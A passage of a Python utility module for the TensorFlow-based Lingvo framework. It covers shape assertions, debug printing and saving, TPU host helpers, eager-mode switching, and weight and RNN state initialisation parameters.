r = tf.cast(tf.convert_to_tensor(r), x.dtype)
return tf.group([
assert_greater_equal(x, l, *args, **kwargs),
assert_less(x, r, *args, **kwargs)
])
def assert_shape_match(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
kwargs['msg'] = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(
r'.*/', '', filepath), line, func)
return ops.assert_shape_match(*args, **kwargs)
else:
return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return ops.assert_same_dim0(xs, *args, **kwargs)
else:
return tf.no_op()
def assert_even_divide(denorm, num): # pylint: disable=invalid-name
"""Asserts that denorm is evenly divided by num."""
denorm = tf.convert_to_tensor(denorm)
num = tf.convert_to_tensor(num)
if denorm.dtype not in (tf.int32, tf.int64):
raise ValueError('denorminator.dtype is not tf.int32 or tf.int64.')
if num.dtype not in (tf.int32, tf.int64):
raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
num = HasShape(num, GetShape(denorm))
quo = denorm // num
return assert_equal(quo * num, denorm)
def AssertIdShape(expected_ids_shape_pattern, ids_shape, *args):
"""Asserts shape expected_ids_shape_pattern matches all other input shapes."""
def AssertFn(inputs):
dependencies = [
assert_shape_match(inputs.ids_shape, inputs.expected_ids_shape_pattern)
] + [
assert_shape_match(inputs.ids_shape, x_shape) for x_shape in inputs.args
]
return with_dependencies(dependencies, inputs.ids_shape)
inputs = NestedMap(
expected_ids_shape_pattern=expected_ids_shape_pattern,
ids_shape=ids_shape,
args=args)
return CallDefun(AssertFn, Transform(tf.convert_to_tensor, inputs))
def _CheckNumerics(x, message=None, *args, **kwargs):
if x.dtype.is_floating:
x_name = x.name if not tf.executing_eagerly() else '[eager]'
if 'name' not in kwargs:
kwargs['name'] = re.sub(r':\d+', '', x_name) + '_CheckNumerics'
return tf.debugging.check_numerics(x, message if message else x_name, *args,
**kwargs)
else:
return x
def CheckNumerics(inp, message=None, *args, **kwargs):
"""Check numerics for tensors in inp."""
if not py_utils_flags.enable_check_numerics():
return inp
if isinstance(inp, list):
return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
if isinstance(inp, tuple):
return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor): # pylint: disable=invalid-name
with tf.control_dependencies(dependencies):
return tf.identity(output_tensor)
def _VarInCollection(var, collection):
"""Return whether a variable `var` is in the given variable collection."""
# We use variable reference for comparison, since variable is not hashable in
# eager mode.
return var.ref() in [v.ref() for v in collection]
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
try:
yield
finally:
np.set_printoptions(**original)
def _Print(name, x):
with _PrintOptions(linewidth=1000):
tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
"""Prints out values of tensors.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Log(z, 'debug compute()', x=x, y=y)
Args:
value: A Tensor. Log happens after this tensor's computed.
prefix: Every tensor is logged with this prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
# Ensures tensors are printed in order.
last = value
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def Debug(tensor, message='', enabled=True, summarize=100, more=None):
"""Wrapper around tf.Print() and tf.logging.info() to simplify debug printing.
x = py_utils.Debug(x)
When the graph is built a regular log info line will be printed:
-DBG- py_utils_test.py:429 x=Tensor(...
Then when the tensor node is evaluated it will print lines like:
-DBG- py_utils_test.py:429 x Const:0[x.shape=][2 2][x=][[1 2][3 4]]
WARNING: The code that parses local variable names can fail. E.g. don't write
two Debug() calls on one line or a Debug() call that spans more than one line.
Args:
tensor: A tensor to print.
message: A message to print.
enabled: To enable the debugging.
summarize: Integer with number of tensor values to print.
more: An optional list of additional tensors.
Returns:
The tensor.
"""
if not enabled or _FromGlobal('disable_py_utils_debug'):
return tensor
if more is None:
more = []
stack = inspect.stack()[1][0]
caller = inspect.getframeinfo(stack)
caller_var = ''
caller_more_vars = []
if caller.code_context:
# Rough and likely to fail. But better than nothing.
match = re.compile(r'Debug\((.*?)(\)|,).*$').search(caller.code_context[0])
if match:
caller_var = match.groups()[0]
if more:
more_vars = re.compile(r'more=\[(.*?)\].*$').search(
caller.code_context[0]).groups()[0]
if more_vars:
caller_more_vars = more_vars.split(',')
the_class = ''
if 'self' in stack.f_locals:
the_class = stack.f_locals['self'].__class__.__name__
header = '-DBG- {}:{}:{}:{} {} '.format(
os.path.basename(caller.filename), the_class, caller.function,
caller.lineno, message)
info = '{}{}={}'.format(header, caller_var, tensor)
for name, val in zip(caller_more_vars, more):
info += ' {}={}'.format(name.strip(), val)
tf.logging.info(info)
if isinstance(tensor, tf.Tensor):
tensors = []
tensors += [tf.constant('{}.shape='.format(caller_var)), tf.shape(tensor)]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}.shape='.format(name.strip())), tf.shape(val)]
tensors += [tf.constant('{}='.format(caller_var)), tensor]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}='.format(name.strip())), val]
name = tensor.name if not tf.executing_eagerly() else '[eager]'
info = '{}{} {}'.format(header, caller_var, name)
return tf.identity(
tf.Print(tensor, tensors, info, summarize=summarize),
re.sub(':.*$', '', name))
return tensor
def _Save(steps, prefix, key, val):
filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
six.ensure_text(key))
with tf.io.gfile.GFile(filename, 'w') as outfile:
np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
"""Saves values of tensors into files.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Save(z, '/path/tmp', x=x, y=y, z=z)
Args:
value: A Tensor. Saving happens after this tensor is computed.
filename_prefix: Every tensor is saved with this filename prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
last = value
steps = GetGlobalStep()
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def HasRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has the expected rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims == expected_rank, (
'Ranks did not match, got %d, '
'expected %d') % (tensor.shape.ndims, expected_rank)
return tensor
if py_utils_flags.enable_asserts():
return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def HasAtLeastRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has rank >= expected_rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims >= expected_rank, (
'Rank of tensor %d did not exceed the expected value %d.') % (
tensor.shape.ndims, expected_rank)
return tensor
if py_utils_flags.enable_asserts():
return with_dependencies(
[tf.debugging.assert_greater_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def GetRank(tensor):
"""Returns tensor's rank as an int if it's available, otherwise a Tensor.
Args:
tensor: The input tensor.
Returns:
Either an int or a Tensor for the rank of the input tensor.
"""
if tensor.shape.ndims is not None:
return tensor.shape.ndims # int
else:
return tf.rank(tensor) # Tensor
def GetShape(tensor, ndims=None):
"""Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
Tries to return static shape if it's available. Note that this means
some of the outputs will be ints while the rest will be Tensors.
Args:
tensor: The input tensor.
ndims: If not None, returns the shapes for the first `ndims` dimensions.
"""
tensor = tf.convert_to_tensor(tensor)
dynamic_shape = tf.shape(tensor)
# Early exit for unranked tensor.
if tensor.shape.ndims is None:
if ndims is None:
return dynamic_shape
else:
return [dynamic_shape[x] for x in range(ndims)]
# Ranked tensor.
if ndims is None:
ndims = tensor.shape.ndims
else:
ndims = min(ndims, tensor.shape.ndims)
# Return mixture of static and dynamic dims.
static_shape = tensor.shape.as_list()
shapes = [
static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
for x in range(ndims)
]
return shapes
def HasShape(tensor, expected_shape, ndims=None):
"""Syntactic sugar for asserting that tensor has the expected shape.
Args:
tensor: A Tensor.
expected_shape: A Python list or a 1D tensor. Elements of expected_shape can
be -1 which indicate that any size is valid for that dimension.
ndims: If not None, check only the first `ndims` dimensions of `tensor`.
Must be equal to the length of `expected_shape` if not None.
Returns:
The input `tensor` with control dependencies that will raise a runtime
error if dynamic shape checks fail.
Raises:
ValueError: A value error if the assertion fails at static shape checks.
"""
if not py_utils_flags.enable_asserts():
return tensor
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
msg = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
filepath), line, func)
tensor_shape = GetShape(tensor)
if ndims is not None:
tensor_shape = tensor_shape[:ndims]
# TODO(jngiam): Attempt to switch back to tf.Assert after it has better
# support on GPUs.
assert_op = ops.assert_shape_match(tensor_shape, expected_shape, msg=msg)
# If expected_shape is a Tensor, then we are unable to perform static checks.
# In this case, we can do a dynamic check and return.
if isinstance(expected_shape, tf.Tensor):
return with_dependencies([assert_op], tensor)
# Infer ranks from the inputs.
expected_rank = len(expected_shape)
if isinstance(tensor_shape, tf.Tensor):
tensor_rank = tensor.shape.ndims
else:
tensor_rank = len(tensor_shape)
# If ndims is None, then either one of the ranks should not be None, or they
# should both match. If both ranks are None, then they are both tensors and
# should be caught by the earlier short-circuit.
if ndims is None:
if (tensor_rank is not None) and (expected_rank != tensor_rank):
raise ValueError('Tensor does not match rank of expected shape.\n'
'Tensor shape: {} Expected shape: {}'.format(
tensor_shape, expected_shape))
# Both tensors can be assumed to be of same rank.
ndims = expected_rank
else:
if (tensor_rank is not None) and (tensor_rank < ndims):
raise ValueError('Tensor has fewer dimensions than ndims.\n'
'Tensor shape: {} ndims: {}'.format(tensor_shape, ndims))
if expected_rank != ndims:
raise ValueError(
'Expected shape must have number of dimensions equal to ndims.\n'
'Expected shape: {} ndims: {}'.format(expected_shape, ndims))
# Ensure that both tensor_shape and expected_shape are both lists.
tensor_shape = tensor_shape[:ndims]
if isinstance(tensor_shape, tf.Tensor):
tensor_shape = tf.unstack(tensor_shape, num=ndims)
# Map tf.Dimension values to their held values.
tensor_shape = [
v.value if isinstance(v, tf.Dimension) else v for v in tensor_shape
]
expected_shape = [
v.value if isinstance(v, tf.Dimension) else v for v in expected_shape
]
all_static_checks = True
for idx, (dim, expected_dim) in enumerate(zip(tensor_shape, expected_shape)):
if isinstance(expected_dim, tf.Tensor):
all_static_checks = False
elif expected_dim == -1:
continue
elif isinstance(dim, tf.Tensor):
all_static_checks = False
elif dim != expected_dim:
raise ValueError('Tensor does not match expected shape on dimension {}.\n'
'Tensor shape: {} Expected shape: {}'.format(
idx, tensor_shape, expected_shape))
if all_static_checks:
return tf.convert_to_tensor(tensor)
else:
return with_dependencies([assert_op], tensor)
def HasSameShape(x, ref):
return HasShape(x, GetShape(ref))
def GetSize(tensor):
shape = GetShape(tensor)
if (isinstance(shape, tf.Tensor) or
any([isinstance(x, tf.Tensor) for x in shape])):
return tf.size(tensor)
return np.prod(shape)
def CausalSelfAttenPadding(seqlen, dtype):
"""Wraps tf.linalg.band_part() for tflite compatibility."""
if FLAGS.tflite_compatible:
# [N, 1]
rows = tf.expand_dims(tf.range(seqlen), -1)
# [1, N]
cols = tf.expand_dims(tf.range(seqlen), 0)
row_cols = rows - cols
return tf.where(row_cols < 0, tf.ones([seqlen, seqlen], dtype),
tf.zeros([seqlen, seqlen], tf.float32))
else:
return 1.0 - tf.linalg.band_part(
tf.ones([seqlen, seqlen], dtype=dtype), -1, 0)
def outside_all_rewrites(): # pylint: disable=invalid-name
return tf.control_dependencies(None)
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
r"""Runs the given function call on TPU host.
Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
Args:
func: the function to invoke.
*args: args of func
**kwargs: kwargs of func
Returns:
The function return value.
"""
if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
_OUTSIDE_COMPILATION.on = True
res = tf.tpu.outside_compilation(func, *args, **kwargs)
_OUTSIDE_COMPILATION.on = False
else:
res = func(*args, **kwargs)
return res
def tpu_host(func): # pylint: disable=invalid-name
r"""Decorates a python function to only run on TPU hosts.
This function has no effect when running on CPU/GPU.
Example::
@py_utils.tpu_host()
def ComputeWER(self):
# Call a custom op computing WER.
Args:
func: the function to invoke
Returns:
A TPU-host only function
"""
def Wrapped(*args, **kwargs):
return RunOnTpuHost(func, *args, **kwargs)
return Wrapped
# Maps a TPU job name ('/job:xxx') to the job's DeviceAssignment object.
# When there is only a single TPU job, the key could be None.
_tpu_device_assignment_dict = dict()
def SetTpuDeviceAssignment(tpu_device_assignment, job=None):
if job in _tpu_device_assignment_dict:
tf.logging.warning('tpu_device_assignment was already set, '
'overwriting with new assignment.')
_tpu_device_assignment_dict[job] = tpu_device_assignment
# This function should called in unittest only.
def ClearTpuDevice():
global _tpu_device_assignment_dict
_tpu_device_assignment_dict = dict()
def GetTpuDeviceAssignment(job=None):
return _tpu_device_assignment_dict[job]
# Whether it's running in eager mode. This is different than
# tf.executing_eagerly(), which will return False inside a tf.function.
_IS_EAGER_MODE = False
# If you get an error "tf.enable_eager_execution must be called at program
# startup." but you are calling this function at the start, check if your change
# adds type hints for "tf.data" and wrap those type hints in quotes.
def SetEagerMode(eager_mode=True, test_mode=False):
"""Switch between Eager and Graph mode. Use this instead of TF APIs."""
global _IS_EAGER_MODE
_IS_EAGER_MODE = eager_mode
# Only change the global flag.
# Used in tests. In those scenarios we might want to use Graph mode along with
# Eager mode. All we need is changing the flag `_IS_EAGER_MODE` without
# calling `enable_eager_execution`/`disable_eager_execution`.
if test_mode:
return
if eager_mode:
tf.enable_eager_execution()
tf.config.set_soft_device_placement(True)
else:
tf.disable_eager_execution()
def IsEagerMode():
return _IS_EAGER_MODE
# Maintains a tf.GradientTape stack.
_GRADIENT_TAPE_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GradientTape(*args, **kwargs):
"""Creates a tf.GradientTape and use it for automatic differentiation."""
tape = tf.GradientTape(*args, **kwargs)
_GRADIENT_TAPE_STACK.stack.append(tape)
try:
with tape:
yield
finally:
_GRADIENT_TAPE_STACK.stack.pop()
def CreateEMAForModel(model_params, global_step):
"""Creates an EMA object for model with param `model_params` if applicable."""
p = model_params
# Check that EMA settings for the model and subtasks match.
def CheckEMA(task_name, task_params):
for field in ['ema_decay', 'ema_decay_moving_vars']:
model_value = p.train.Get(field)
task_value = task_params.train.Get(field)
if task_value != model_value:
raise ValueError(
f'Params {field} does not match. Value in model: '
f'{model_value}, value in task {task_name}: {task_value}')
if 'task_params' in p:
# MultiTaskModel. All subtasks should use the same ema settings.
for task_name, task_params in p.task_params.IterParams():
CheckEMA(task_name, task_params)
else:
assert 'task' in p
# SingleTaskModel.
CheckEMA(p.task.name, p.task)
if p.train.ema_decay > 0:
return tf.train.ExponentialMovingAverage(
decay=p.train.ema_decay, num_updates=global_step)
return None
def SessionConfig(soft_placement=True,
inline=True,
cluster_def=None,
disable_meta_optimizer=False):
"""Returns a session config proto.
Args:
soft_placement: Turns allow_soft_placement on iff True.
inline: Turns do_function_inlining on iff True.
cluster_def: A tf.train.ClusterDef describing the cluster.
disable_meta_optimizer: Turns off grappler/metagraph optimizer.
Returns:
A TF session config proto.
"""
session_config = tf.config_pb2.ConfigProto(
allow_soft_placement=soft_placement,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
cluster_def=cluster_def)
session_config.share_cluster_devices_in_session = True
if disable_meta_optimizer:
# Useful if start-up time is critical.
session_config.graph_options.rewrite_options.disable_meta_optimizer = True
# Disable layout optimizer which increases GPU memory usage.
session_config.graph_options.rewrite_options.layout_optimizer = (
rewriter_config_pb2.RewriterConfig.OFF)
return session_config
def AssertIsCompatible(a, b):
assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
"""Set shapes in dst_nmap using those in src_nmap."""
AssertIsCompatible(src_nmap, dst_nmap)
for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
dst.set_shape(src.shape)
def Dtypes(nmap_list):
"""Returns all tensors' data types in a list."""
return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
"""Flattens 'x' by extracting tensors from nested structures to a list."""
return tf.nest.flatten(x)
def Pack(tmpl, values):
"""Packs 'values' according to 'tmpl'."""
return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
"""Replaces every nested value x in 'v' with fn(x) and returns the result."""
return tf.nest.map_structure(fn, *v)
def ConvertNoneGradientToZeros(xs, dxs):
"""Sanitize dxs so that None becomes zeros appropriately.
Args:
xs: A list of tensors.
dxs: A list of tensors. dxs[i] corresponds to xs[i]'s gradient.
Returns:
A `.NestedMap` same as dxs with None replaced by a zero tensor.
"""
fn = lambda x, dx: tf.zeros_like(x) if dx is None else dx
return Transform(fn, xs, dxs)
def IsCompatible(lhs, rhs):
"""Returns true if lhs and rhs are compatible."""
try:
tf.nest.assert_same_structure(lhs, rhs)
return True
except (ValueError, TypeError):
return False
class _Unique:
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (id(v) in self._vset):
return False
else:
self._vset.add(id(v))
return True
def ToUniqueList(nmap):
"""Returns the flattened `nmap` with duplicates removed."""
return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
"""Wraps a dict to provide a read-only view of its contents.
Dict keys can also be accessed by attribute.
Args:
backing: Dict-like object to wrap.
Returns:
Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
"""
class Wrapper:
"""Wrapper object."""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
def __getitem__(self, key):
return backing[key]
def __len__(self):
return len(backing)
def __iter__(self):
return iter(backing)
def __getattr__(self, key):
return backing[key]
def __hasattr__(self, key):
return key in backing
def __setattr__(self, key, value):
raise AttributeError('Dictionary is read-only.')
def __setitem__(self, key, value):
raise AttributeError('Dictionary is read-only.')
return Wrapper()
def ToStaticShape(shape):
"""Converts 'shape' to a static shape."""
if isinstance(shape, (list, tuple)):
shape = [
dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
]
static_shape = []
for dim in shape:
if symbolic.IsExpr(dim):
static_shape.append(symbolic.ToStatic(dim))
else:
static_shape.append(dim)
return static_shape
else:
return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler:
"""A reservoir sampler.
This class implements reservoir sampling: Given a limit of `num_samples` total
samples, this class maintains a uniform probability (1 / `num_samples`) of
keeping any item dynamically added to the sampler.
See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
"""
def __init__(self, num_samples):
assert num_samples > 0
self._num_samples = num_samples
self._num_seen_items = 0
self._samples = []
def Add(self, item):
"""Add item to sampler."""
self._num_seen_items += 1
if len(self._samples) < self._num_samples:
self._samples.append(item)
return
index = np.random.randint(0, self._num_seen_items)
if index < self._num_samples:
self._samples[index] = item
@property
def samples(self):
"""Fetch the current samples from the sampler."""
return self._samples
class RNNCellStateInit:
"""State initialization functions for RNN cell init state."""
@staticmethod
def _Params(method, seed):
p = hyperparams.Params()
p.Define('method', method,
'Initialization method. Should be one of zeros, random_normal.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Zeros():
"""tf.zeros()."""
return RNNCellStateInit._Params('zeros', seed=None)
@staticmethod
def RandomNormal(seed=None):
"""tf.random.normal()."""
return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
"""Initial state definitions for RNN cell implementations.
Args:
shape: A array of ints/symbols for specifying the shape of the state.
init: Hyperparameters as returned by one of the static implemetaitons in
RNNCellStateInit.
dtype: The dype of the states. Defaults to tf.float32.
name: A name for the operation. If --stateless_vars_init is set, this name
is used to generate a seed on a per-variable basis. Otherwise, this name
is optional.
is_eval: Bool, set to True if we need special behavior in eval mode.
Returns:
A Tensor of the specified shape, and sampled from the distribution as
defined by the init parameters.
"""
shape = ToStaticShape(shape)
if init is None:
init = DefaultRNNCellStateInit()
if dtype is None:
dtype = tf.float32
method = init.method
if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
elif method in ['random_normal']:
if use_stateless_vars_init():
if name is None:
raise ValueError('InitRNNCellState() requires a `name` argument when '
'--stateless_vars_init is enabled.')
seed = _GenerateStatelessRngSeed(name, init.seed)
init_state = stateless_random_ops.stateless_random_normal(
shape=shape, dtype=dtype, name=name, seed=seed)
else:
init_state = tf.random.normal(
shape=shape, dtype=dtype, name=name, seed=init.seed)
else:
raise ValueError('Initialization method (%s) not supported.' % method)
return init_state
class WeightInit:
"""Static class providing weight initialization config params."""
@staticmethod
def _Params(method, scale, seed, custom_v_init=None):
"""Parameters of this class."""
p = hyperparams.Params()
p.Define('method', method, 'Initialization method.')
p.Define('scale', scale, 'Initialization scale.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Define('custom_v_init', custom_v_init,
'A custom tf.init_ops.Initializer instance.')
p.Freeze()
return p
@staticmethod
def Gaussian(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1.0)."""
return WeightInit._Params('gaussian', scale, seed)
@staticmethod
def Uniform(scale=1.0, seed=None):
"""scale * tf.random.uniform(-1.0, 1.0)."""
return WeightInit._Params('uniform', scale, seed)
@staticmethod
def UniformPositive(scale=1.0, seed=None):
"""scale * tf.random.uniform(0., 1.0)."""
return WeightInit._Params('uniform_positive', scale, seed)
@staticmethod
def Category(scale=2, seed=None):
"""tf.floor(scale * tf.random.uniform(0., 1.0))."""
return WeightInit._Params('category', scale, seed)
@staticmethod
def Xavier(scale=1.0, seed=None):
"""Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def XavierWithFixupParams(scale=1.0,
depth=1.0,
layers_per_residual_block=1.0,
seed=None):
"""Xavier initialization with Fixup."""
scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def GeoMeanXavier(scale=1.0, seed=None):
"""A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
return WeightInit._Params('geo_mean_xavier', scale, seed)
@staticmethod
def Constant(scale=1.0):
"""scale."""
return WeightInit._Params('constant', scale, 0)
@staticmethod
def TruncatedGaussian(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1.0)."""
return WeightInit._Params('truncated_gaussian', scale, seed)
@staticmethod
def GaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
@staticmethod
def GaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
@staticmethod
def GaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
@staticmethod
def GaussianSqrtFanAvg(scale=1.0, seed=None):
"""tf.random.normal(0, sqrt(2.0 / (in + out)))."""
return WeightInit._Params('gaussian_sqrt_fanavg', scale, seed)
@staticmethod
def UniformSqrtDim(scale=1.0, seed=None):
"""scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
return WeightInit._Params('uniform_sqrt_dim', scale, seed)
@staticmethod
def UniformUnitScaling(scale=1.0, seed=None):
"""scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
return WeightInit._Params('uniform_unit_scaling', scale, seed)
@staticmethod
def UniformUnitScalingFanAvg(scale=1.0, seed=None):
"""Same as tf.variance_scaling_initializer() ...
Samples are drawn from a uniform distribution within [-limit, limit], with
limit = sqrt(3 * scale / n)
where
n = max(1., (fan_in + fan_out) / 2).
See tf.keras.initializers.VarianceScaling for details.
Args:
scale: A Python float.
seed: A Python int or None.
Returns:
A WeightInit param.
"""
return WeightInit._Params('uniform_unit_scaling_fan_avg', scale, seed)
@staticmethod
def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
@staticmethod
def KaimingUniformFanInRelu(scale=1.0, seed=None):
return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
@staticmethod
def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
@staticmethod
def CustomVarInit(custom_v_init):
return WeightInit._Params('custom', 1.0, None, custom_v_init)
@staticmethod
def CustomConstantVarInit(custom_v_init):
return WeightInit._Params('custom_constant', 1.0, None, custom_v_init)
@staticmethod
def ScaledDeltaOrthogonal(scale=1.0, seed=None):
return WeightInit._Params('delta_orthogonal', scale, seed)
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
# Here we use 1.000001 as a signature for user picking up the
# default param initializer.
return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
# TODO(rpang, jonathanasdf): explore adding _is_default to hyperparams.Param.
def IsDefaultParamInit(p):
return (p.method == 'xavier' and
abs(p.scale - _DEFAULT_XAVIER_INIT) < 1e-7 and p.seed is None)
def WeightParams(shape,
init=None,
dtype=None,
collections=None,
device_mesh=None,
tensor_split_dims_mapping=None):
"""Returns a hyperparams for a weight variable given the shape/init/dtype."""
if init is None:
init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
if dtype is None:
dtype = tf.float32
if collections is None:
collections = []
if device_mesh is not None:
assert tensor_split_dims_mapping is not None
assert len(tensor_split_dims_mapping) == len(shape)
p = hyperparams.Params()
p.Define('dtype', dtype, 'The weight data type.')
p.Define('shape', shape, 'The weight shape.')
p.Define('init', init, 'Initialization method.')
p.Define('collections', collections,
'Variable collections this weight belongs to.')
p.Define(
'device_mesh', device_mesh,
'A numpy.ndarray describing the topology of a device mesh to partition'
' this variable onto. Each element in the np.ndarray is the ID of a'
' device in the topology. device_mesh and tensor_split_dims_mapping below'
' together specifies how this weight tensor should be sharded across'
' different tpu cores. If None, this variable is not sharded.'
' Here are examples: np.array([0, 1, 2, 3, 4, 5, 6, 7]) which is a 1d'
' mesh with 8 devices, np.array([[0, 1, 2, 3], [4, 5, 6, 7]]) which is'
' 2d matrix of 8 devices.')
p.Define(
'tensor_split_dims_mapping', tensor_split_dims_mapping,
'A list of integers that map each tensor axis to the device mesh axis'
' along which it is sharded. Its length is the tensor rank, and'
' split_dims_mapping[i] is device mesh axis for tensor dimension i. Use'
' -1 for tensor dimensions that are not sharded. If the list is set to'
' None and a device_mesh is specified, the sharding will be treated as'
' replicated. Here is a concrete examples: '
' device_mesh=np.array([[0, 1, 2, 3] [4, 5, 6, 7]]), of shape [2, 4]'
' shape=[x, y, z], so this is a 3d variable.'
' tensor_split_dims_mapping=[-1, -1, 1], in this case, the third dim'
' of the variable is split along the second dim of the mesh. Each '
' split of the variable is of the shape [x, y, z/4].')
# The following two flags are used in Jax only.
p.Define(
'repeat_prefix', None,
'If not None, the full shape of this var is repeat_prefix+shape. '
'For example, if repeat_prefix=[16, 2], and shape=[512, 1024], then '
'real shape of variable is [16, 2, 512, 1024]. "repeat_prefix" is '
'often used if a layer is to be used in a recurrent loop, where '
'logically there are n sub-layers, but for performance/hbm usage '
'reasons we stack all the variables in creating those n-layers.')
p.Define('repeat_prefix_split_dims_mapping', None,
'Tensor split dims mapping for the repeat_prefix dims.')
return p
def FindNeeded(endpoints):
"""List names of tensors and operations required to compute endpoints."""
names_seen = set()
queue = []
for e in Flatten(endpoints):
if isinstance(e, tf.Operation):
queue.append(e)
else:
queue.append(e.op)
while queue:
op = queue.pop()
name = op.name
if name not in names_seen:
names_seen.add(name)
names_seen.update((o.name for o in op.outputs))
queue.extend(i.op for i in op.inputs)
queue.extend(op.control_inputs)
return names_seen
class _CollectionGetter:
"""Get graph local value from a defined collection."""
def __init__(self, key, default_factory):
self._key = key
self._default_factory = default_factory
def __call__(self):
collection = tf.get_collection(self._key)
if collection:
assert len(collection) == 1
return collection[0]
value = self._default_factory()
tf.add_to_collection(self._key, value)
return value
def SanitizeScopeKey(key):
"""Removes invalid symbols from name_scope keys."""
if key.startswith('_'):
key = key[1:]
return key.replace('[', '_').replace(']', '')
# Maintain a session for unit tests (initialized in test_utils.py).
